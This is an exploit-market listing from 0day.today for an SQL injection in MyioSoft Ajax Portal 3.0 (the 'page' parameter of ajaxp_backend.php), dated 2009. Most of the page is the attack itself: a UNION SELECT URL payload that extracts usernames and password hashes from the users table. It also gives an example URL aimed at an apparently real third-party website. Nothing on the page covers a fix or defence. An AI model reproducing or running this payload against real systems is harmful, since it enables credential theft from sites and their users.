[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

MyioSoft Ajax Portal 3.0 (page) SQL Injection Vulnerability

Author
cOndemned
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4987
Category
web applications
Date add
31-03-2009
Platform
unsorted
===========================================================
MyioSoft Ajax Portal 3.0 (page) SQL Injection Vulnerability
===========================================================


AjaxPortal 3.0 (ajaxp_backend.php page) Remote SQL Injection Vulnerability
Bug found && Exploited by cOndemned

Proof of Concept : http://[host]/[ajaxportal-3.0_path]/ajaxp_backend.php?page=-1+union+select+1,concat_ws(char(58),username,password),3,4,5,6,7+from+PREFIX_users--

Example : http://calmpc.net/ajaxp_backend.php?page=-1+union+select+1,concat_ws(char(58),username,password),3,4,5,6,7+from+dbPfixajaxp_users--


Passwords are encoded using MySQL PASSWORD() function. (used algorithm depends on MySQL version.)



#  0day.today [2024-12-24]  #